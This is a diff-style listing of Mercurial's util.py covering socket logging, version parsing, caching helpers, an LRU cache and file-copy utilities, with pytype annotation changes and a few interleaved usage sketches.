1017 1017 self._writedata(res[0])
1018 1018
1019 1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 1020 if not self.reads:
1021 1021 return
1022 1022
1023 1023 if self.logdataapis:
1024 1024 self.fh.write(
1025 1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 1026 % (self.name, size, flags, res[0])
1027 1027 )
1028 1028
1029 1029 self._writedata(buf[0 : res[0]])
1030 1030
1031 1031 def recv_into(self, res, buf, size=0, flags=0):
1032 1032 if not self.reads:
1033 1033 return
1034 1034
1035 1035 if self.logdataapis:
1036 1036 self.fh.write(
1037 1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 1038 )
1039 1039
1040 1040 self._writedata(buf[0:res])
1041 1041
1042 1042 def send(self, res, data, flags=0):
1043 1043 if not self.writes:
1044 1044 return
1045 1045
1046 1046 self.fh.write(
1047 1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 1048 )
1049 1049 self._writedata(data)
1050 1050
1051 1051 def sendall(self, res, data, flags=0):
1052 1052 if not self.writes:
1053 1053 return
1054 1054
1055 1055 if self.logdataapis:
1056 1056 # Returns None on success. So don't bother reporting return value.
1057 1057 self.fh.write(
1058 1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 1059 )
1060 1060
1061 1061 self._writedata(data)
1062 1062
1063 1063 def sendto(self, res, data, flagsoraddress, address=None):
1064 1064 if not self.writes:
1065 1065 return
1066 1066
1067 1067 if address:
1068 1068 flags = flagsoraddress
1069 1069 else:
1070 1070 flags = 0
1071 1071
1072 1072 if self.logdataapis:
1073 1073 self.fh.write(
1074 1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 1075 % (self.name, len(data), flags, address, res)
1076 1076 )
1077 1077
1078 1078 self._writedata(data)
1079 1079
1080 1080 def setblocking(self, res, flag):
1081 1081 if not self.states:
1082 1082 return
1083 1083
1084 1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085 1085
1086 1086 def settimeout(self, res, value):
1087 1087 if not self.states:
1088 1088 return
1089 1089
1090 1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091 1091
1092 1092 def gettimeout(self, res):
1093 1093 if not self.states:
1094 1094 return
1095 1095
1096 1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097 1097
1098 1098 def setsockopt(self, res, level, optname, value):
1099 1099 if not self.states:
1100 1100 return
1101 1101
1102 1102 self.fh.write(
1103 1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 1104 % (self.name, level, optname, value, res)
1105 1105 )
1106 1106
1107 1107
1108 1108 def makeloggingsocket(
1109 1109 logh,
1110 1110 fh,
1111 1111 name,
1112 1112 reads=True,
1113 1113 writes=True,
1114 1114 states=True,
1115 1115 logdata=False,
1116 1116 logdataapis=True,
1117 1117 ):
1118 1118 """Turn a socket into a logging socket."""
1119 1119
1120 1120 observer = socketobserver(
1121 1121 logh,
1122 1122 name,
1123 1123 reads=reads,
1124 1124 writes=writes,
1125 1125 states=states,
1126 1126 logdata=logdata,
1127 1127 logdataapis=logdataapis,
1128 1128 )
1129 1129 return socketproxy(fh, observer)
1130 1130
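And a matching sketch for sockets, using a local socketpair (illustrative only; socket.socketpair is POSIX-flavored):

    import io
    import socket
    left, right = socket.socketpair()
    logged = makeloggingsocket(io.BytesIO(), left, b'srv')
    logged.sendall(b'ping')         # the observer logs: srv> sendall(4, 0)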
1131 1131
1132 1132 def version():
1133 1133 """Return version information if available."""
1134 1134 try:
1135 1135 from . import __version__
1136 1136
1137 1137 return __version__.version
1138 1138 except ImportError:
1139 1139 return b'unknown'
1140 1140
1141 1141
1142 1142 def versiontuple(v=None, n=4):
1143 1143 """Parses a Mercurial version string into an N-tuple.
1144 1144
1145 1145 The version string to be parsed is specified with the ``v`` argument.
1146 1146 If it isn't defined, the current Mercurial version string will be parsed.
1147 1147
1148 1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 1149 returned values:
1150 1150
1151 1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 1152 >>> versiontuple(v, 2)
1153 1153 (3, 6)
1154 1154 >>> versiontuple(v, 3)
1155 1155 (3, 6, 1)
1156 1156 >>> versiontuple(v, 4)
1157 1157 (3, 6, 1, '190-df9b73d2d444')
1158 1158
1159 1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161 1161
1162 1162 >>> v = b'3.6'
1163 1163 >>> versiontuple(v, 2)
1164 1164 (3, 6)
1165 1165 >>> versiontuple(v, 3)
1166 1166 (3, 6, None)
1167 1167 >>> versiontuple(v, 4)
1168 1168 (3, 6, None, None)
1169 1169
1170 1170 >>> v = b'3.9-rc'
1171 1171 >>> versiontuple(v, 2)
1172 1172 (3, 9)
1173 1173 >>> versiontuple(v, 3)
1174 1174 (3, 9, None)
1175 1175 >>> versiontuple(v, 4)
1176 1176 (3, 9, None, 'rc')
1177 1177
1178 1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 1179 >>> versiontuple(v, 2)
1180 1180 (3, 9)
1181 1181 >>> versiontuple(v, 3)
1182 1182 (3, 9, None)
1183 1183 >>> versiontuple(v, 4)
1184 1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185 1185
1186 1186 >>> versiontuple(b'4.6rc0')
1187 1187 (4, 6, None, 'rc0')
1188 1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 1190 >>> versiontuple(b'.1.2.3')
1191 1191 (None, None, None, '.1.2.3')
1192 1192 >>> versiontuple(b'12.34..5')
1193 1193 (12, 34, None, '..5')
1194 1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 1195 (1, 2, 3, '.4.5.6')
1196 1196 """
1197 1197 if not v:
1198 1198 v = version()
1199 1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 1200 if not m:
1201 1201 vparts, extra = b'', v
1202 1202 elif m.group(2):
1203 1203 vparts, extra = m.groups()
1204 1204 else:
1205 1205 vparts, extra = m.group(1), None
1206 1206
1207 1207 assert vparts is not None # help pytype
1208 1208
1209 1209 vints = []
1210 1210 for i in vparts.split(b'.'):
1211 1211 try:
1212 1212 vints.append(int(i))
1213 1213 except ValueError:
1214 1214 break
1215 1215 # (3, 6) -> (3, 6, None)
1216 1216 while len(vints) < 3:
1217 1217 vints.append(None)
1218 1218
1219 1219 if n == 2:
1220 1220 return (vints[0], vints[1])
1221 1221 if n == 3:
1222 1222 return (vints[0], vints[1], vints[2])
1223 1223 if n == 4:
1224 1224 return (vints[0], vints[1], vints[2], extra)
1225 1225
1226 1226
1227 1227 def cachefunc(func):
1228 1228 '''cache the result of function calls'''
1229 1229 # XXX doesn't handle keyword args
1230 1230 if func.__code__.co_argcount == 0:
1231 1231 listcache = []
1232 1232
1233 1233 def f():
1234 1234 if len(listcache) == 0:
1235 1235 listcache.append(func())
1236 1236 return listcache[0]
1237 1237
1238 1238 return f
1239 1239 cache = {}
1240 1240 if func.__code__.co_argcount == 1:
1241 1241 # we gain a small amount of time because
1242 1242 # we don't need to pack/unpack the list
1243 1243 def f(arg):
1244 1244 if arg not in cache:
1245 1245 cache[arg] = func(arg)
1246 1246 return cache[arg]
1247 1247
1248 1248 else:
1249 1249
1250 1250 def f(*args):
1251 1251 if args not in cache:
1252 1252 cache[args] = func(*args)
1253 1253 return cache[args]
1254 1254
1255 1255 return f
1256 1256
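A quick sketch of the memoization (the function is hypothetical):

    calls = []

    def square(x):
        calls.append(x)
        return x * x

    square = cachefunc(square)
    square(3)
    square(3)
    assert calls == [3]             # the second call came from the cache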
1257 1257
1258 1258 class cow(object):
1259 1259 """helper class to make copy-on-write easier
1260 1260
1261 1261 Call preparewrite before doing any writes.
1262 1262 """
1263 1263
1264 1264 def preparewrite(self):
1265 1265 """call this before writes, return self or a copied new object"""
1266 1266 if getattr(self, '_copied', 0):
1267 1267 self._copied -= 1
1268 return self.__class__(self)
1268 # Function cow.__init__ expects 1 arg(s), got 2 [wrong-arg-count]
1269 return self.__class__(self) # pytype: disable=wrong-arg-count
1269 1270 return self
1270 1271
1271 1272 def copy(self):
1272 1273 """always do a cheap copy"""
1273 1274 self._copied = getattr(self, '_copied', 0) + 1
1274 1275 return self
1275 1276
1276 1277
1277 1278 class sortdict(collections.OrderedDict):
1278 1279 """a simple sorted dictionary
1279 1280
1280 1281 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 1282 >>> d2 = d1.copy()
1282 1283 >>> d2
1283 1284 sortdict([('a', 0), ('b', 1)])
1284 1285 >>> d2.update([(b'a', 2)])
1285 1286 >>> list(d2.keys()) # should still be in last-set order
1286 1287 ['b', 'a']
1287 1288 >>> d1.insert(1, b'a.5', 0.5)
1288 1289 >>> d1
1289 1290 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 1291 """
1291 1292
1292 1293 def __setitem__(self, key, value):
1293 1294 if key in self:
1294 1295 del self[key]
1295 1296 super(sortdict, self).__setitem__(key, value)
1296 1297
1297 1298 if pycompat.ispypy:
1298 1299 # __setitem__() isn't called as of PyPy 5.8.0
1299 1300 def update(self, src, **f):
1300 1301 if isinstance(src, dict):
1301 1302 src = pycompat.iteritems(src)
1302 1303 for k, v in src:
1303 1304 self[k] = v
1304 1305 for k in f:
1305 1306 self[k] = f[k]
1306 1307
1307 1308 def insert(self, position, key, value):
1308 1309 for (i, (k, v)) in enumerate(list(self.items())):
1309 1310 if i == position:
1310 1311 self[key] = value
1311 1312 if i >= position:
1312 1313 del self[k]
1313 1314 self[k] = v
1314 1315
1315 1316
1316 1317 class cowdict(cow, dict):
1317 1318 """copy-on-write dict
1318 1319
1319 1320 Be sure to call d = d.preparewrite() before writing to d.
1320 1321
1321 1322 >>> a = cowdict()
1322 1323 >>> a is a.preparewrite()
1323 1324 True
1324 1325 >>> b = a.copy()
1325 1326 >>> b is a
1326 1327 True
1327 1328 >>> c = b.copy()
1328 1329 >>> c is a
1329 1330 True
1330 1331 >>> a = a.preparewrite()
1331 1332 >>> b is a
1332 1333 False
1333 1334 >>> a is a.preparewrite()
1334 1335 True
1335 1336 >>> c = c.preparewrite()
1336 1337 >>> b is c
1337 1338 False
1338 1339 >>> b is b.preparewrite()
1339 1340 True
1340 1341 """
1341 1342
1342 1343
1343 1344 class cowsortdict(cow, sortdict):
1344 1345 """copy-on-write sortdict
1345 1346
1346 1347 Be sure to call d = d.preparewrite() before writing to d.
1347 1348 """
1348 1349
1349 1350
1350 1351 class transactional(object): # pytype: disable=ignored-metaclass
1351 1352 """Base class for making a transactional type into a context manager."""
1352 1353
1353 1354 __metaclass__ = abc.ABCMeta
1354 1355
1355 1356 @abc.abstractmethod
1356 1357 def close(self):
1357 1358 """Successfully closes the transaction."""
1358 1359
1359 1360 @abc.abstractmethod
1360 1361 def release(self):
1361 1362 """Marks the end of the transaction.
1362 1363
1363 1364 If the transaction has not been closed, it will be aborted.
1364 1365 """
1365 1366
1366 1367 def __enter__(self):
1367 1368 return self
1368 1369
1369 1370 def __exit__(self, exc_type, exc_val, exc_tb):
1370 1371 try:
1371 1372 if exc_type is None:
1372 1373 self.close()
1373 1374 finally:
1374 1375 self.release()
1375 1376
1376 1377
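A minimal concrete subclass, sketched to show the contract (names hypothetical):

    class demotransaction(transactional):
        def close(self):
            self.committed = True       # called only on clean exit

        def release(self):
            self.released = True        # always called last

    with demotransaction():
        pass                            # close() then release() run here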
1377 1378 @contextlib.contextmanager
1378 1379 def acceptintervention(tr=None):
1379 1380 """A context manager that closes the transaction on InterventionRequired
1380 1381
1381 1382 If no transaction was provided, this simply runs the body and returns
1382 1383 """
1383 1384 if not tr:
1384 1385 yield
1385 1386 return
1386 1387 try:
1387 1388 yield
1388 1389 tr.close()
1389 1390 except error.InterventionRequired:
1390 1391 tr.close()
1391 1392 raise
1392 1393 finally:
1393 1394 tr.release()
1394 1395
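Sketched with the hypothetical demotransaction above; the point is that the transaction is closed before InterventionRequired propagates:

    tr = demotransaction()
    try:
        with acceptintervention(tr):
            raise error.InterventionRequired(b'resolve conflicts first')
    except error.InterventionRequired:
        pass
    # tr.close() ran before the exception escaped; tr.release() ran after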
1395 1396
1396 1397 @contextlib.contextmanager
1397 1398 def nullcontextmanager(enter_result=None):
1398 1399 yield enter_result
1399 1400
1400 1401
1401 1402 class _lrucachenode(object):
1402 1403 """A node in a doubly linked list.
1403 1404
1404 1405 Holds a reference to nodes on either side as well as a key-value
1405 1406 pair for the dictionary entry.
1406 1407 """
1407 1408
1408 1409 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1409 1410
1410 1411 def __init__(self):
1411 self.next = None
1412 self.prev = None
1412 self.next = self
1413 self.prev = self
1413 1414
1414 1415 self.key = _notset
1415 1416 self.value = None
1416 1417 self.cost = 0
1417 1418
1418 1419 def markempty(self):
1419 1420 """Mark the node as emptied."""
1420 1421 self.key = _notset
1421 1422 self.value = None
1422 1423 self.cost = 0
1423 1424
1424 1425
1425 1426 class lrucachedict(object):
1426 1427 """Dict that caches most recent accesses and sets.
1427 1428
1428 1429 The dict consists of an actual backing dict - indexed by original
1429 1430 key - and a doubly linked circular list defining the order of entries in
1430 1431 the cache.
1431 1432
1432 1433 The head node is the newest entry in the cache. If the cache is full,
1433 1434 we recycle head.prev and make it the new head. Cache accesses result in
1434 1435 the node being moved to before the existing head and being marked as the
1435 1436 new head node.
1436 1437
1437 1438 Items in the cache can be inserted with an optional "cost" value. This is
1438 1439 simply an integer that is specified by the caller. The cache can be queried
1439 1440 for the total cost of all items presently in the cache.
1440 1441
1441 1442 The cache can also define a maximum cost. If a cache insertion would
1442 1443 cause the total cost of the cache to go beyond the maximum cost limit,
1443 1444 nodes will be evicted to make room for the new node. This can be used
1444 1445 to e.g. set a max memory limit and associate an estimated bytes size
1445 1446 cost to each item in the cache. By default, no maximum cost is enforced.
1446 1447 """
1447 1448
1448 1449 def __init__(self, max, maxcost=0):
1449 1450 self._cache = {}
1450 1451
1451 self._head = head = _lrucachenode()
1452 head.prev = head
1453 head.next = head
1452 self._head = _lrucachenode()
1454 1453 self._size = 1
1455 1454 self.capacity = max
1456 1455 self.totalcost = 0
1457 1456 self.maxcost = maxcost
1458 1457
1459 1458 def __len__(self):
1460 1459 return len(self._cache)
1461 1460
1462 1461 def __contains__(self, k):
1463 1462 return k in self._cache
1464 1463
1465 1464 def __iter__(self):
1466 1465 # We don't have to iterate in cache order, but why not.
1467 1466 n = self._head
1468 1467 for i in range(len(self._cache)):
1469 1468 yield n.key
1470 1469 n = n.next
1471 1470
1472 1471 def __getitem__(self, k):
1473 1472 node = self._cache[k]
1474 1473 self._movetohead(node)
1475 1474 return node.value
1476 1475
1477 1476 def insert(self, k, v, cost=0):
1478 1477 """Insert a new item in the cache with optional cost value."""
1479 1478 node = self._cache.get(k)
1480 1479 # Replace existing value and mark as newest.
1481 1480 if node is not None:
1482 1481 self.totalcost -= node.cost
1483 1482 node.value = v
1484 1483 node.cost = cost
1485 1484 self.totalcost += cost
1486 1485 self._movetohead(node)
1487 1486
1488 1487 if self.maxcost:
1489 1488 self._enforcecostlimit()
1490 1489
1491 1490 return
1492 1491
1493 1492 if self._size < self.capacity:
1494 1493 node = self._addcapacity()
1495 1494 else:
1496 1495 # Grab the last/oldest item.
1497 1496 node = self._head.prev
1498 1497
1499 1498 # At capacity. Kill the old entry.
1500 1499 if node.key is not _notset:
1501 1500 self.totalcost -= node.cost
1502 1501 del self._cache[node.key]
1503 1502
1504 1503 node.key = k
1505 1504 node.value = v
1506 1505 node.cost = cost
1507 1506 self.totalcost += cost
1508 1507 self._cache[k] = node
1509 1508 # And mark it as newest entry. No need to adjust order since it
1510 1509 # is already self._head.prev.
1511 1510 self._head = node
1512 1511
1513 1512 if self.maxcost:
1514 1513 self._enforcecostlimit()
1515 1514
1516 1515 def __setitem__(self, k, v):
1517 1516 self.insert(k, v)
1518 1517
1519 1518 def __delitem__(self, k):
1520 1519 self.pop(k)
1521 1520
1522 1521 def pop(self, k, default=_notset):
1523 1522 try:
1524 1523 node = self._cache.pop(k)
1525 1524 except KeyError:
1526 1525 if default is _notset:
1527 1526 raise
1528 1527 return default
1529 1528
1530 1529 assert node is not None # help pytype
1531 1530 value = node.value
1532 1531 self.totalcost -= node.cost
1533 1532 node.markempty()
1534 1533
1535 1534 # Temporarily mark as newest item before re-adjusting head to make
1536 1535 # this node the oldest item.
1537 1536 self._movetohead(node)
1538 1537 self._head = node.next
1539 1538
1540 1539 return value
1541 1540
1542 1541 # Additional dict methods.
1543 1542
1544 1543 def get(self, k, default=None):
1545 1544 try:
1546 1545 return self.__getitem__(k)
1547 1546 except KeyError:
1548 1547 return default
1549 1548
1550 1549 def peek(self, k, default=_notset):
1551 1550 """Get the specified item without moving it to the head
1552 1551
1553 1552 Unlike get(), this doesn't mutate the internal state. But be aware
1554 1553 that it doesn't mean peek() is thread safe.
1555 1554 """
1556 1555 try:
1557 1556 node = self._cache[k]
1557 assert node is not None # help pytype
1558 1558 return node.value
1559 1559 except KeyError:
1560 1560 if default is _notset:
1561 1561 raise
1562 1562 return default
1563 1563
1564 1564 def clear(self):
1565 1565 n = self._head
1566 1566 while n.key is not _notset:
1567 1567 self.totalcost -= n.cost
1568 1568 n.markempty()
1569 1569 n = n.next
1570 1570
1571 1571 self._cache.clear()
1572 1572
1573 1573 def copy(self, capacity=None, maxcost=0):
1574 1574 """Create a new cache as a copy of the current one.
1575 1575
1576 1576 By default, the new cache has the same capacity as the existing one.
1577 1577 But, the cache capacity can be changed as part of performing the
1578 1578 copy.
1579 1579
1580 1580 Items in the copy have an insertion/access order matching this
1581 1581 instance.
1582 1582 """
1583 1583
1584 1584 capacity = capacity or self.capacity
1585 1585 maxcost = maxcost or self.maxcost
1586 1586 result = lrucachedict(capacity, maxcost=maxcost)
1587 1587
1588 1588 # We copy entries by iterating in oldest-to-newest order so the copy
1589 1589 # has the correct ordering.
1590 1590
1591 1591 # Find the first non-empty entry.
1592 1592 n = self._head.prev
1593 1593 while n.key is _notset and n is not self._head:
1594 1594 n = n.prev
1595 1595
1596 1596 # We could potentially skip the first N items when decreasing capacity.
1597 1597 # But let's keep it simple unless it is a performance problem.
1598 1598 for i in range(len(self._cache)):
1599 1599 result.insert(n.key, n.value, cost=n.cost)
1600 1600 n = n.prev
1601 1601
1602 1602 return result
1603 1603
1604 1604 def popoldest(self):
1605 1605 """Remove the oldest item from the cache.
1606 1606
1607 1607 Returns the (key, value) describing the removed cache entry.
1608 1608 """
1609 1609 if not self._cache:
1610 1610 return
1611 1611
1612 1612 # Walk the linked list backwards starting at tail node until we hit
1613 1613 # a non-empty node.
1614 1614 n = self._head.prev
1615
1616 assert n is not None # help pytype
1617
1615 1618 while n.key is _notset:
1616 1619 n = n.prev
1617 1620
1618 1621 assert n is not None # help pytype
1619 1622
1620 1623 key, value = n.key, n.value
1621 1624
1622 1625 # And remove it from the cache and mark it as empty.
1623 1626 del self._cache[n.key]
1624 1627 self.totalcost -= n.cost
1625 1628 n.markempty()
1626 1629
1627 1630 return key, value
1628 1631
1629 1632 def _movetohead(self, node):
1630 1633 """Mark a node as the newest, making it the new head.
1631 1634
1632 1635 When a node is accessed, it becomes the freshest entry in the LRU
1633 1636 list, which is denoted by self._head.
1634 1637
1635 1638 Visually, let's make ``N`` the new head node (* denotes head):
1636 1639
1637 1640 previous/oldest <-> head <-> next/next newest
1638 1641
1639 1642 ----<->--- A* ---<->-----
1640 1643 | |
1641 1644 E <-> D <-> N <-> C <-> B
1642 1645
1643 1646 To:
1644 1647
1645 1648 ----<->--- N* ---<->-----
1646 1649 | |
1647 1650 E <-> D <-> C <-> B <-> A
1648 1651
1649 1652 This requires the following moves:
1650 1653
1651 1654 C.next = D (node.prev.next = node.next)
1652 1655 D.prev = C (node.next.prev = node.prev)
1653 1656 E.next = N (head.prev.next = node)
1654 1657 N.prev = E (node.prev = head.prev)
1655 1658 N.next = A (node.next = head)
1656 1659 A.prev = N (head.prev = node)
1657 1660 """
1658 1661 head = self._head
1659 1662 # C.next = D
1660 1663 node.prev.next = node.next
1661 1664 # D.prev = C
1662 1665 node.next.prev = node.prev
1663 1666 # N.prev = E
1664 1667 node.prev = head.prev
1665 1668 # N.next = A
1666 1669 # It is tempting to do just "head" here, however if node is
1667 1670 # adjacent to head, this will do bad things.
1668 1671 node.next = head.prev.next
1669 1672 # E.next = N
1670 1673 node.next.prev = node
1671 1674 # A.prev = N
1672 1675 node.prev.next = node
1673 1676
1674 1677 self._head = node
1675 1678
1676 1679 def _addcapacity(self):
1677 1680 """Add a node to the circular linked list.
1678 1681
1679 1682 The new node is inserted before the head node.
1680 1683 """
1681 1684 head = self._head
1682 1685 node = _lrucachenode()
1683 1686 head.prev.next = node
1684 1687 node.prev = head.prev
1685 1688 node.next = head
1686 1689 head.prev = node
1687 1690 self._size += 1
1688 1691 return node
1689 1692
1690 1693 def _enforcecostlimit(self):
1691 1694 # This should run after an insertion. It should only be called if total
1692 1695 # cost limits are being enforced.
1693 1696 # The most recently inserted node is never evicted.
1694 1697 if len(self) <= 1 or self.totalcost <= self.maxcost:
1695 1698 return
1696 1699
1697 1700 # This is logically equivalent to calling popoldest() until we
1698 1701 # free up enough cost. We don't do that since popoldest() needs
1699 1702 # to walk the linked list and doing this in a loop would be
1700 1703 # quadratic. So we find the first non-empty node and then
1701 1704 # walk nodes until we free up enough capacity.
1702 1705 #
1703 1706 # If we only removed the minimum number of nodes to free enough
1704 1707 # cost at insert time, chances are high that the next insert would
1705 1708 # also require pruning. This would effectively constitute quadratic
1706 1709 # behavior for insert-heavy workloads. To mitigate this, we set a
1707 1710 # target cost that is a percentage of the max cost. This will tend
1708 1711 # to free more nodes when the high water mark is reached, which
1709 1712 # lowers the chances of needing to prune on the subsequent insert.
1710 1713 targetcost = int(self.maxcost * 0.75)
1711 1714
1712 1715 n = self._head.prev
1713 1716 while n.key is _notset:
1714 1717 n = n.prev
1715 1718
1716 1719 while len(self) > 1 and self.totalcost > targetcost:
1717 1720 del self._cache[n.key]
1718 1721 self.totalcost -= n.cost
1719 1722 n.markempty()
1720 1723 n = n.prev
1721 1724
1722 1725
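A usage sketch showing recency-based eviction (keys arbitrary):

    d = lrucachedict(2)
    d[b'a'] = 1
    d[b'b'] = 2
    d[b'a']                 # touch b'a'; b'b' becomes the oldest entry
    d[b'c'] = 3             # at capacity, so b'b' is evicted
    assert b'a' in d and b'c' in d and b'b' not in d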
1723 1726 def lrucachefunc(func):
1724 1727 '''cache most recent results of function calls'''
1725 1728 cache = {}
1726 1729 order = collections.deque()
1727 1730 if func.__code__.co_argcount == 1:
1728 1731
1729 1732 def f(arg):
1730 1733 if arg not in cache:
1731 1734 if len(cache) > 20:
1732 1735 del cache[order.popleft()]
1733 1736 cache[arg] = func(arg)
1734 1737 else:
1735 1738 order.remove(arg)
1736 1739 order.append(arg)
1737 1740 return cache[arg]
1738 1741
1739 1742 else:
1740 1743
1741 1744 def f(*args):
1742 1745 if args not in cache:
1743 1746 if len(cache) > 20:
1744 1747 del cache[order.popleft()]
1745 1748 cache[args] = func(*args)
1746 1749 else:
1747 1750 order.remove(args)
1748 1751 order.append(args)
1749 1752 return cache[args]
1750 1753
1751 1754 return f
1752 1755
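Unlike cachefunc above, only the most recent results (a little over 20) are kept; a sketch:

    def double(x):
        return x * 2

    double = lrucachefunc(double)
    for i in range(30):
        double(i)
    # the earliest arguments have been evicted; recent ones hit the cache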
1753 1756
1754 1757 class propertycache(object):
1755 1758 def __init__(self, func):
1756 1759 self.func = func
1757 1760 self.name = func.__name__
1758 1761
1759 1762 def __get__(self, obj, type=None):
1760 1763 result = self.func(obj)
1761 1764 self.cachevalue(obj, result)
1762 1765 return result
1763 1766
1764 1767 def cachevalue(self, obj, value):
1765 1768 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1766 1769 obj.__dict__[self.name] = value
1767 1770
1768 1771
1769 1772 def clearcachedproperty(obj, prop):
1770 1773 '''clear a cached property value, if one has been set'''
1771 1774 prop = pycompat.sysstr(prop)
1772 1775 if prop in obj.__dict__:
1773 1776 del obj.__dict__[prop]
1774 1777
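A sketch of the two helpers together (class and value are hypothetical):

    class config(object):
        @propertycache
        def expensive(self):
            return 42                   # stand-in for a costly computation

    c = config()
    c.expensive                         # computed, then stored in c.__dict__
    c.expensive                         # plain attribute lookup, no call
    clearcachedproperty(c, b'expensive')    # next access recomputes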
1775 1778
1776 1779 def increasingchunks(source, min=1024, max=65536):
1777 1780 """return no less than min bytes per chunk while data remains,
1778 1781 doubling min after each chunk until it reaches max"""
1779 1782
1780 1783 def log2(x):
1781 1784 if not x:
1782 1785 return 0
1783 1786 i = 0
1784 1787 while x:
1785 1788 x >>= 1
1786 1789 i += 1
1787 1790 return i - 1
1788 1791
1789 1792 buf = []
1790 1793 blen = 0
1791 1794 for chunk in source:
1792 1795 buf.append(chunk)
1793 1796 blen += len(chunk)
1794 1797 if blen >= min:
1795 1798 if min < max:
1796 1799 min = min << 1
1797 1800 nmin = 1 << log2(blen)
1798 1801 if nmin > min:
1799 1802 min = nmin
1800 1803 if min > max:
1801 1804 min = max
1802 1805 yield b''.join(buf)
1803 1806 blen = 0
1804 1807 buf = []
1805 1808 if buf:
1806 1809 yield b''.join(buf)
1807 1810
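For example, ten 500-byte chunks run through the default limits come out as progressively larger chunks:

    chunks = [b'x' * 500] * 10
    sizes = [len(c) for c in increasingchunks(chunks)]
    assert sizes == [1500, 2500, 1000]      # the tail flushes whatever is left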
1808 1811
1809 1812 def always(fn):
1810 1813 return True
1811 1814
1812 1815
1813 1816 def never(fn):
1814 1817 return False
1815 1818
1816 1819
1817 1820 def nogc(func):
1818 1821 """disable garbage collector
1819 1822
1820 1823 Python's garbage collector triggers a GC each time a certain number of
1821 1824 container objects (the number being defined by gc.get_threshold()) are
1822 1825 allocated even when marked not to be tracked by the collector. Tracking has
1823 1826 no effect on when GCs are triggered, only on what objects the GC looks
1824 1827 into. As a workaround, disable GC while building complex (huge)
1825 1828 containers.
1826 1829
1827 1830 This garbage collector issue has been fixed in 2.7, but it still affects
1828 1831 CPython's performance.
1829 1832 """
1830 1833
1831 1834 def wrapper(*args, **kwargs):
1832 1835 gcenabled = gc.isenabled()
1833 1836 gc.disable()
1834 1837 try:
1835 1838 return func(*args, **kwargs)
1836 1839 finally:
1837 1840 if gcenabled:
1838 1841 gc.enable()
1839 1842
1840 1843 return wrapper
1841 1844
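# Usage sketch (illustrative name): keep the cyclic GC disabled while a
# huge container is being built:
#
#   @nogc
#   def _buildmap(items):
#       return {k: v for k, v in items}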
1842 1845
1843 1846 if pycompat.ispypy:
1844 1847 # PyPy runs slower with gc disabled
1845 1848 nogc = lambda x: x
1846 1849
1847 1850
1848 1851 def pathto(root, n1, n2):
1849 1852 # type: (bytes, bytes, bytes) -> bytes
1850 1853 """return the relative path from one place to another.
1851 1854 root should use os.sep to separate directories
1852 1855 n1 should use os.sep to separate directories
1853 1856 n2 should use "/" to separate directories
1854 1857 returns an os.sep-separated path.
1855 1858
1856 1859 If n1 is a relative path, it's assumed it's
1857 1860 relative to root.
1858 1861 n2 should always be relative to root.
1859 1862 """
1860 1863 if not n1:
1861 1864 return localpath(n2)
1862 1865 if os.path.isabs(n1):
1863 1866 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1864 1867 return os.path.join(root, localpath(n2))
1865 1868 n2 = b'/'.join((pconvert(root), n2))
1866 1869 a, b = splitpath(n1), n2.split(b'/')
1867 1870 a.reverse()
1868 1871 b.reverse()
1869 1872 while a and b and a[-1] == b[-1]:
1870 1873 a.pop()
1871 1874 b.pop()
1872 1875 b.reverse()
1873 1876 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1874 1877
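# Illustrative example on POSIX (where os.sep is '/'):
#
#   pathto(b'/repo', b'a/b', b'a/c/d')  ->  b'../c/d'
#
# i.e. the path leading from directory 'a/b' to 'a/c/d', with both
# names taken relative to the root.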
1875 1878
1876 1879 def checksignature(func, depth=1):
1877 1880 '''wrap a function with code to check for calling errors'''
1878 1881
1879 1882 def check(*args, **kwargs):
1880 1883 try:
1881 1884 return func(*args, **kwargs)
1882 1885 except TypeError:
1883 1886 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1884 1887 raise error.SignatureError
1885 1888 raise
1886 1889
1887 1890 return check
1888 1891
1889 1892
1890 1893 # a whitelist of known filesystems where hardlinks work reliably
1891 1894 _hardlinkfswhitelist = {
1892 1895 b'apfs',
1893 1896 b'btrfs',
1894 1897 b'ext2',
1895 1898 b'ext3',
1896 1899 b'ext4',
1897 1900 b'hfs',
1898 1901 b'jfs',
1899 1902 b'NTFS',
1900 1903 b'reiserfs',
1901 1904 b'tmpfs',
1902 1905 b'ufs',
1903 1906 b'xfs',
1904 1907 b'zfs',
1905 1908 }
1906 1909
1907 1910
1908 1911 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1909 1912 """copy a file, preserving mode and optionally other stat info like
1910 1913 atime/mtime
1911 1914
1912 1915 checkambig argument is used with filestat, and is useful only if
1913 1916 destination file is guarded by any lock (e.g. repo.lock or
1914 1917 repo.wlock).
1915 1918
1916 1919 copystat and checkambig should be exclusive.
1917 1920 """
1918 1921 assert not (copystat and checkambig)
1919 1922 oldstat = None
1920 1923 if os.path.lexists(dest):
1921 1924 if checkambig:
1922 1925 oldstat = checkambig and filestat.frompath(dest)
1923 1926 unlink(dest)
1924 1927 if hardlink:
1925 1928 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1926 1929 # unless we are confident that dest is on a whitelisted filesystem.
1927 1930 try:
